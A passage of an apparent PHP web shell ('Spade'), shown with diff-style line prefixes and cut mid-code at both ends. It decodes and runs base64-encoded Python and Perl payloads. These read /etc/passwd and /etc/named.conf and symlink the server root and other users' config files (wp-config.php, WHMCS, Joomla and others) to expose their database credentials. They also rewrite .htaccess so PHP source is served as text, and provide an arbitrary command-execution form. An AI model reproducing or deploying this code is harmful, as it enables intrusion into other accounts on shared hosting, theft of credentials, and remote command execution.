sc2U6CglwYXRoID0gIi9odG1sLyIKY291bnRlcj0xCmlwcz1vcGVuKCJzcC5waHRtbCIsInciKQppcHMud3JpdGUoc2YpCgpmb3IgZnVzciBpbiBzdXNyOgoJZm9yIGZzaXRlIGluIHNpdGV4OgoJCWZ1PWZ1c3JbMDo1XQoJCXM9ZnNpdGVbMDo1XQoJCWlmIGZ1PT1zOgoJCQlpcHMud3JpdGUoIjx0cj48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOmxpbWU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9c3AudHh0L2hvbWUvJXMlcyB0YXJnZXQ9X2JsYW5rID4lczwvYT48L3RkPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQoJCQljb3VudGVyPWNvdW50ZXIrMQ==";
- $meme = base64_decode($htsym);
- $fp = fopen('sp.py','w');
- $fw = fwrite($fp,$meme);
- @fclose($fw);
- $eaacho = exe("python sp.py"); echo $eaacho; echo "<center><iframe src='Spade_pythonsym' height='400' width='98%'></iframe></center>";
- unlink ('sp.py');
- }
- if(isset($_POST['perlsym'])){
- $peperl = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCgpsb2NhbCAoJGJ1ZmZlciwgQHBhaXJzLCAkcGFpciwgJG5hbWUsICR2YWx1ZSwgJUZPUk0pOwogICAgIyBSZWFkIGluIHRleHQKICAgICRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gPX4gdHIvYS16L0EtWi87CiAgICBpZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiR0VUIikKICAgIHsKCSRidWZmZXIgPSAkRU5WeydRVUVSWV9TVFJJTkcnfTsKICAgIH0KICAgICMgU3BsaXQgaW5mb3JtYXRpb24gaW50byBuYW1lL3ZhbHVlIHBhaXJzCiAgICBAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOwogICAgZm9yZWFjaCAkcGFpciAoQHBhaXJzKQogICAgewoJKCRuYW1lLCAkdmFsdWUpID0gc3BsaXQoLz0vLCAkcGFpcik7CgkkdmFsdWUgPX4gdHIvKy8gLzsKCSR2YWx1ZSA9fiBzLyUoLi4pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsKCSRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsKICAgIH0KICAgICRzZXJ2ZXIgPSAkRk9STXtzZXJ2ZXJ9OwogICAgJHBlcmwgID0gJEZPUk17cGVybH07CgkkY29uZmlnICA9ICRGT1JNe2NvbmZpZ307CgkkZXhlY3V0ZSAgPSAkRk9STXtleGVjdXRlfTsKCSRleGVjbWQgPSAkRk9STXtleGVjbWR9OwoJJGV4ZSAgPSAkRk9STXtleGV9OwpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsKcHJpbnQnPCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPgo8aHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+CjxodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KLm5ld1N0eWxlMSB7CmJhY2tncm91bmQtY29sb3I6ICMxMTExMTE7CmZvbnQtZmFtaWx5OiAiQ291cmllciBOZXciLCBDb3VyaWVyLCBtb25vc3BhY2U7CmZvbnQtd2VpZ2h0OiBib2xkOwpjb2xvcjogbGltZTsKfQouc3R5bGUxIHsKdGV4dC1hbGlnbjogY2VudGVyOwpmb250LWNvbG9yOiBsaW1lOwp9Ci5idXQKe2JhY2tncm91bmQtY29sb3I6ICMxMTExMTE7Y29sb3I6bGltZTsgYm9yZGVyLWNvbG9yOiMxMTExMTE7fQouYm94CntiYWNrZ3JvdW5kLWNvbG9yOiMxYzFjMWM7Y29sb3I6bGltZTt3aWR0aDoyNyU7IGJvcmRlci1jb2xvcjojMTExMTExO30KLnRib3gKe2JhY2tncm91bmQtY29sb3I6IzFjMWMxYztjb2xvcjpsaW1lO2JvcmRlci1jb2xvcjojMTExMTExO30KPC9zdHlsZT4KPC9oZWFkPgo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4KPGNlbnRlcj48Zm9udCBzaXplPTQ+PHByZT4KICAgICAgX19fICAgICAgICAgICAgICAgICAgICAgICAgIF9fXyAgICAgICAgICAgX19fICAgICAgICAgICBfX18gICAgIAogICAgIC8gIC9cICAgICAgICAgIF9fXyAgICAgICAgICAvICAvXCAgICAgICAgIC8gIC9cICAgICAgICAgLyAgL1wgICAgCiAgICAvICAvOjpcICAgICAgICAvICAvXCAgICAgICAgLyAgLzo6XCAgICAgICAvICAvOjpcICAgICAgIC8gIC86OlwgICAKICAgL19fLzovXDpcICAgICAgLyAgLzo6XCAgICAgIC8gIC86L1w6XCAgICAgLyAgLzovXDpcICAgICAvICAvOi9cOlwgIAogIF9cXyBcOlwgXDpcICAgIC8gIC86L1w6XCAgICAvICAvOjpcIFw6XCAgIC8gIC86LyAgXDpcICAgLyAgLzo6XCBcOlwgCiAvX18vXCBcOlwgXDpcICAvICAvOjpcIFw6XCAgL19fLzovXDpcX1w6XCAvX18vOi8gXF9fXDp8IC9fXy86L1w6XCBcOlwKIFwgIFw6XCBcOlxfXC8gL19fLzovXDpcX1w6XCBcX19cLyAgXDpcLzovIFwgIFw6XCAvICAvOi8gXCAgXDpcIFw6XF9cLwogIFwgIFw6XF9cOlwgICBcX19cLyAgXDpcLzovICAgICAgXF9fXDo6LyAgIFwgIFw6XCAgLzovICAgXCAgXDpcIFw6XCAgCiAgIFwgIFw6XC86LyAgICAgICAgXCAgXDo6LyAgICAgICAvICAvOi8gICAgIFwgIFw6XC86LyAgICAgXCAgXDpcX1wvICAKICAgIFwgIFw6Oi8gICAgICAgICAgXF9fXC8gICAgICAgL19fLzovICAgICAgIFxfX1w6Oi8gICAgICAgXCAgXDpcICAgIAogICAgIFxfX1wvICAgICAgICAgICAgICAgICAgICAgICBcX19cLyAgICAgICAgICAgIH5+ICAgICAgICAgXF9fXC8gICAgCgogICAgICAgICAgICAgICAgICAgICAgIAo8L3ByZT48L2ZvbnQ+PC9mb250PjwvY2VudGVyPiAKPHAgY2xhc3M9InN0eWxlMSI+PC9wPgo8dGFibGUgYWxpZ249Y2VudGVyPjx0cj48dGQ+PGZvcm0+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InNlcnZlciIgdmFsdWU9IlNlcnZlciBTeW0iPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTZXJ2ZXIiIGNsYXNzPWJ1dD48L2Zvcm0+PC90ZD4KPHRkPjxmb3JtPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPSJwZXJsIiB2YWx1ZT0iUGVybCBTeW0iPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJQZXJsIiBjbGFzcz1idXQ+PC9mb3JtPjwvdGQ+Cjx0ZD48Zm9ybT48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iY29uZmlnIiB2YWx1ZT0iR2V0IGNvbmZpZyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNvbmZpZyIgY2xhc3M9YnV0PjwvZm9ybT48L3RkPjwvdHI+PC90YWJsZT48YnI+PGJyPgo8Y2VudGVyPjxmb3JtPjxpbnB1dCB0eXBlPXRleHQgbmFtZT1leGVjdXRlIGNsYXNzPWJveCB2YWx1ZT0nLiRleGVjdXRlLic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImV4ZWNtZCIgdmFsdWU9IkV4ZWN1dGUiPiA8aW5wdXQgdHlwZT1zdWJtaXQgbmFtZT1leGUgdmFsdWU9IkV4ZWN1dGUiIGNsYXNzPWJ1dD48L2Zvcm0+PC9jZW50ZXI+JzsKCnN1YiBnZXRzeW0KewoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJF9bMV0uJ35+dkJ1bGxldGluMS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2NvcmUvaW5jbHVkZXMvY29uZmlnLnBocCcsJF9bMV0uJ35+dkJ1bGxldGluNS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRfWzFdLid+fnZCdWxsZXRpbjIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkX1sxXS4nfn52QnVsbGV0aW4zLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvdmIvY29yZS9pbmNsdWRlcy9jb25maWcucGhwJywkX1sxXS4nfn52QnVsbGV0aW41LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jL2NvbmZpZy5waHAnLCRfWzFdLid+fm15YmIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywkX1sxXS4nfn5QaHBiYjEudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkX1sxXS4nfn5QaHBiYjIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRfWzFdLid+fmlwYjEudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywkX1sxXS4nfn5Xb3JkcHJlc3MxLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywkX1sxXS4nfn5Xb3JkcHJlc3MyLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fkpvb21sYTEudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9ibG9nL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5Kb29tbGEyLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5Kb29tbGEzLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvYmItY29uZmlnLnBocCcsJF9bMV0uJ35+Ym94YmlsbGluZy50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2JpbGxpbmcvYmItY29uZmlnLnBocCcsJF9bMV0uJ35+Ym94YmlsbGluZy50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJF9bMV0uJ35+V2htMS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3dobWMvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fldobTIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG0zLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG00LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fldobTUudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG02LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJF9bMV0uJ35+V2htNy50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG04LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvb3JkZXIvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fldobTkudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJF9bMV0uJ35+NS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRfWzFdLid+fjQudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRfWzFdLid+fmludmlzaW8udHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJF9bMV0uJ35+Ny50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywkX1sxXS4nfn44LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRfWzFdLid+fm1rLXBvcnRhbGUxLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywkX1sxXS4nfn4xMi50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3NldHRpbmdzLnBocCcsJF9bMV0uJ35+U21mLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jbHVkZXMvZnVuY3Rpb25zLnBocCcsJF9bMV0uJ35+cGhwYmIzLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRfWzFdLid+fmluZmluaXR5LnR4dCcpOwp9CnN1YiBjaGRyCnsKCWNoZGlyICRfWzBdOwoJb3BlbihEQVRBLCAiPi5odGFjY2VzcyIpOwoJcHJpbnQgREFUQSAiT3B0aW9ucyBhbGxcbkRpcmVjdG9yeUluZGV4IHNwLmh0bWxcbkFkZFR5cGUgdGV4dC9wbGFpbiAucGhwXG5BZGRIYW5kbGVyIHNlcnZlci1wYXJzZWQgLnBocFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5odG1sXG5BZGRIYW5kbGVyIHR4dCAuaHRtbFxuUmVxdWlyZSBOb25lXG5TYXRpc2Z5IEFueSI7Cn0KaWYoJHNlcnZlciBlcSAiU2VydmVyIFN5bSIpCnsKCW1rZGlyICJTcGFkZV9wZXJsc3ltIiwgMDc1NTsKCSZjaGRyKCJTcGFkZV9wZXJsc3ltIik7CgljaGRpciAiU3BhZGVfcGVybHN5bSI7CglvcGVuIChkMG1haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJQGtyID0gPGQwbWFpbnM+OwoJY2xvc2UgZDBtYWluczsKCWlmICgkZXJyKQoJewoJCW9wZW4gSU5QVVQsICI8L2V0Yy9wYXNzd2QiOwoJCXdoaWxlICggPElOUFVUPiApCgkJewoJCQkkbGluZT0kXzsgQHNwcnQ9c3BsaXQoLzovLCRsaW5lKTsgJHVzZXI9JHNwcnRbMF07CgkJCXN5c3RlbSgnbG4gLXMgL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sICcgLiAkdXNlcik7CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlNlcnZlciBTeW08L2E+PC9jZW50ZXI+JzsKCX0KCWVsc2UKCXsKCQlmb3JlYWNoIG15ICRvbmUgKEBrcikKCQl7CgkJCWlmKCRvbmUgPX4gbS8uKj96b25lICIoLio/KSIgey8pCgkJCXsKCQkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kMTsKCQkJCSRvd25lciA9IGdldHB3dWlkKChzdGF0KCRmaWxlbmFtZSkpWzRdKTsKCQkJCXN5c3RlbSgnbG4gLXMgL2hvbWUvJy4kb3duZXIuJy9wdWJsaWNfaHRtbCAnIC4gJDEpOwoJCQl9CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlNlcnZlciBTeW08L2E+PC9jZW50ZXI+JzsKCX0KfQplbHNpZigkcGVybCBlcSAiUGVybCBTeW0iKQp7Cglta2RpciAiU3BhZGVfcGVybHN5bSIsIDA3NTU7CgkmY2hkcigiU3BhZGVfcGVybHN5bSIpOwoJY2hkaXIgIlNwYWRlX3BlcmxzeW0iOwoJb3BlbiAoZDBtYWlucywgJy9ldGMvbmFtZWQuY29uZicpIG9yICRlcnI9MTsKCUBrciA9IDxkMG1haW5zPjsKCWNsb3NlIGQwbWFpbnM7CglpZiAoJGVycikKCXsKCQlvcGVuIElOUFVULCAiPC9ldGMvcGFzc3dkIjsKCQl3aGlsZSAoIDxJTlBVVD4gKQoJCXsKCQkJJGxpbmU9JF87IEBzcHJ0PXNwbGl0KC86LywkbGluZSk7ICR1c2VyPSRzcHJ0WzBdOwoJCQlzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwnLCAkdXNlcik7CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlBlcmwgU3ltPC9hPjwvY2VudGVyPic7Cgl9CgllbHNlCgl7CgkJZm9yZWFjaCBteSAkb25lIChAa3IpCgkJewoJCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCQl7CgkJCQkkZmlsZW5hbWU9ICIvZXRjL3ZhbGlhc2VzLyIuJDE7CgkJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCQlzeW1saW5rKCcvaG9tZS8nLiRvd25lci4nL3B1YmxpY19odG1sJywgJDEpOwoJCQl9CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlBlcmwgU3ltPC9hPjwvY2VudGVyPic7Cgl9Cn0KZWxzaWYoJGNvbmZpZyBlcSAiR2V0IGNvbmZpZyIpCnsKCW1rZGlyICJTcGFkZV9wZXJsc3ltMiIsIDA3NTU7CgkmY2hkcigiU3BhZGVfcGVybHN5bTIiKTsKCWNoZGlyICJTcGFkZV9wZXJsc3ltMiI7CglvcGVuIChkMG1haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJQGtyID0gPGQwbWFpbnM+OwoJY2xvc2UgZDBtYWluczsKCWlmICgkZXJyKQoJewoJCW9wZW4gSU5QVVQsICI8L2V0Yy9wYXNzd2QiOwoJCXdoaWxlICggPElOUFVUPiApCgkJewoJCQkkbGluZT0kXzsgQHNwcnQ9c3BsaXQoLzovLCRsaW5lKTsgJHVzZXI9JHNwcnRbMF07CgkJCSR1c2VyMSA9ICR1c2VyOwoJCQkmZ2V0c3ltKCR1c2VyLCR1c2VyMSk7CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltMj5Db25maWcgU3ltPC9hPjwvY2VudGVyPic7Cgl9CgllbHNlCgl7CgkJZm9yZWFjaCBteSAkb25lIChAa3IpCgkJewoJCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCQl7CgkJCQkkZmlsZW5hbWU9ICIvZXRjL3ZhbGlhc2VzLyIuJDE7CgkJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCQkmZ2V0c3ltKCRvd25lciwkMSk7CgkJCX0KCQl9CgkJcHJpbnQgJzxjZW50ZXI+Ly8+PiA8YSBocmVmPVNwYWRlX3BlcmxzeW0yPkNvbmZpZyBTeW08L2E+PC9jZW50ZXI+JzsKCX0KfQplbHNpZigkZXhlY21kIGVxICJFeGVjdXRlIikKewoJcHJpbnQgJzxicj48YnI+PGNlbnRlcj48cHJlPicucmVhZHBpcGUoJGV4ZWN1dGUpLic8L3ByZT48L2NlbnRlcj4nOwp9CnByaW50ICc8L2JvZHk+PC9odG1sPic7";
- $lelwasym = base64_decode($peperl);
- $fp1212 = fopen('spade.pl','w');
- $fw11111 = fwrite($fp1212,$lelwasym);
- @fclose($fw11111);
- chmod("spade.pl",0755); echo '<br><center><iframe src="spade.pl" height="400" class="button" width="98%"></iframe></center>';
- }
- if(isset($_POST['sym1'])){
- error_reporting(0);
- ob_start();
- $dir = "Spade_sym1";
- @mkdir($dir);
- $dir2 = "Spade_sym2";
- @mkdir($dir2);
- $dir3 = "Spade_sym3";
- @mkdir($dir3);
- $dir4 = "Spade_sym4";
- @mkdir($dir4);
- $dir5 = "Spade_sym5";
- @mkdir($dir5);
- $dir6 = "Spade_sym6";
- @mkdir($dir6);
- $dir7 = "Spade_sym7";
- @mkdir($dir7);
- //Spade_Sym1
- $sec1 = "Spade_sym1/.htaccess";
- $hsec1 = fopen($sec1, 'w') or die("Error: Can't open file");
- $con1 = "Options Indexes FollowSymLinks\n DirectoryIndex spade1.htm\n AddType txt .php\n AddHandler txt .php\n AddType txt .html\n AddHandler txt .html\n Options all\n Options\n Allow from all\n Require None\n Satisfy Any";
- fwrite($hsec1, $con1);
- fclose($hsec1);
- //Spade_sym2
- $sec2 = "Spade_sym2/.htaccess";
- $hsec2 = fopen($sec2, 'w') or die("Error: Can't open file");
- $con2 = "Options +FollowSymLinks\n DirectoryIndex spade2.html\n RemoveHandler .php\n AddType application/octet-stream .php ";
- fwrite($hsec2, $con2);
- fclose($hsec2);
- //Spade_sym3
- $sec3 = "Spade_sym3/.htaccess";
- $hsec3 = fopen($sec3, 'w') or die("Error: Can't open file");
- $con3 = "Options +FollowSymLinks\n DirectoryIndex spade3.html\n Options +Indexes\n AddType text/plain .php\n AddHandler server-parsed .php";
- fwrite($hsec3, $con3);
- fclose($hsec3);
- //Spade_sym4
- $sec4 = "Spade_sym4/.htaccess";
- $hsec4 = fopen($sec4, 'w') or die("Error: Can't open file");
- $con4 = "Options Indexes FollowSymLinks\n DirectoryIndex spade4.htm\n AddType txt .php\n AddHandler txt .php";
- fwrite($hsec4, $con4);
- fclose($hsec4);
- //Spade_sym5
- $sec5 = "Spade_sym5/.htaccess";
- $hsec5 = fopen($sec5, 'w') or die("Error: Can't open file");
- $con5 = "Options all\n DirectoryIndex spade5.html\n AddType text/plain .php\n AddHandler server-parsed .php\n AddType text/plain .html";
- fwrite($hsec5, $con5);
- fclose($hsec5);
- //Spade_sym6
- $sec6 = "Spade_sym6/.htaccess";
- $hsec6 = fopen($sec6, 'w') or die("Error: Can't open file");
- $con6 = "Options +FollowSymLinks\n DirectoryIndex spade6.html\n Options +Indexes\n AddType text/plain .php\n AddHandler server-parsed .php\n AddType text/plain .html";
- fwrite($hsec6, $con6);
- fclose($hsec6);
- //Spade_sym7
- $sec7 = "Spade_sym7/.htaccess";
- $hsec7 = fopen($sec7, 'w') or die("Error: Can't open file");
- $con7 = "Options Indexes FollowSymLinks\n AddType text/plain .php .inc .asp .php3\n Options All\n Options All";
- fwrite($hsec7, $con7);
- fclose($hsec7);
- for($k=1;$k<8;$k++){
- if("$fp$k"){
- chdir('Spade_sym'.$k);
- exe('ln -s / spade.txt');
- chdir('../');
- }else{
- echo "<font color=red>Symlink V1 Error!</font>";
- }
- }//for
- echo "<table><tr><th>User</th><th>Symlink</th></tr>";
- $etc = file("/etc/passwd");
- if(!$etc){ die("<font color=red>Symlink V1 Error!</font>");
- }else{
- foreach($etc as $passwd){
- $ogmeme = explode(':', $passwd);
- $meme = $ogmeme['0'];
- echo "<tr><td>".$meme."</td><td><a href='Spade_sym1/spade.txt/home/".$meme."/public_html/'>Sym1</a> :~: <a href='Spade_sym2/spade.txt/home/".$meme."/public_html/'>Sym2</a> :~: <a href='Spade_sym3/spade.txt/home/".$meme."/public_html/'>Sym3</a> :~: <a href='Spade_sym4/spade.txt/home/".$meme."/public_html/'>Sym4</a> :~: <a href='Spade_sym5/spade.txt/home/".$meme."/public_html/'>Sym5</a> :~: <a href='Spade_sym6/spade.txt/home/".$meme."/public_html/'>Sym6</a> :~: <a href='Spade_sym7/spade.txt/home/".$meme."/public_html/'>Sym7</a></td></tr>";
- }//foreach
- }///etc/passwd
- echo "</table>";
- }
- if(isset($_POST['sym2'])){
- echo "<table><tr><th>Domains</th><th>User</th><th>Symlink</th></tr>";
- if(!is_file("DATA.txt")){
- $named = @file("/etc/named.conf");
- }else{
- $named = @file("DATA.txt");
- }
- if(!$named){ die("<font color=red>Symlink V2 Error!</font>");
- }else{
- foreach($named as $domains){
- preg_match_all('#zone "(.*)"#', $domains, $d0mains);
- if(strlen(trim($d0mains[1][0])) > 2){
- $meme = posix_getpwuid(@fileowner("/etc/valiases/".$d0mains[1][0]));
- echo "<tr><td><a href='http://www.".$d0mains[1][0]."/' target='_blank'>".$d0mains[1][0]."</a></td><td>".$meme['name']."</td><td><a href='Spade_sym1/spade.txt/home/".$meme['name']."/public_html/'>Sym1</a> :~: <a href='Spade_sym2/spade.txt/home/".$meme['name']."/public_html/'>Sym2</a> :~: <a href='Spade_sym3/spade.txt/home/".$meme['name']."/public_html/'>Sym3</a> :~: <a href='Spade_sym4/spade.txt/home/".$meme['name']."/public_html/'>Sym4</a> :~: <a href='Spade_sym5/spade.txt/home/".$meme['name']."/public_html/'>Sym5</a> :~: <a href='Spade_sym6/spade.txt/home/".$meme['name']."/public_html/'>Sym6</a> :~: <a href='Spade_sym7/spade.txt/home/".$meme['name']."/public_html/'>Sym7</a></td></tr>";
- }//ifstatement
- }//foreach
- }
- echo "</table>";
- }
- echo "</center>";
- }elseif($_GET['do'] == 'symlink') {
- echo "<center><h1 class='titulo'>SERVER SYMLINKER</h1><br>";
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- $d0mains = @file("/etc/named.conf");
- ##httaces
- if($d0mains){
- @mkdir("spade_sym",0777);
- @chdir("spade_sym");
- @exe("ln -s / root");
- $file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex spade.htm
- AddType text/plain .php
- AddHandler text/plain .php
- Satisfy Any';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);@fclose($fp3);
- echo "
- <table align=center border=1 style='width:60%;border-color:#333333;'>
- <tr>
- <td align=center><font size=2>S. No.</font></td>
- <td align=center><font size=2>Domains</font></td>
- <td align=center><font size=2>Users</font></td>
- <td align=center><font size=2>Symlink</font></td>
- </tr>";
- $dcount = 1;
- foreach($d0mains as $d0main){
- if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
- echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
- <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
- <td>".$user['name']."</td>
- <td><a href='$full/spade_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
- flush();
- $dcount++;}}}
- echo "</table>";
- }else{
- $TEST=@file('/etc/passwd');
- if ($TEST){
- @mkdir("spade_sym",0777);
- @chdir("spade_sym");
- exe("ln -s / root");
- $file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex spade.htm
- AddType text/plain .php
- AddHandler text/plain .php
- Satisfy Any';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);
- @fclose($fp3);
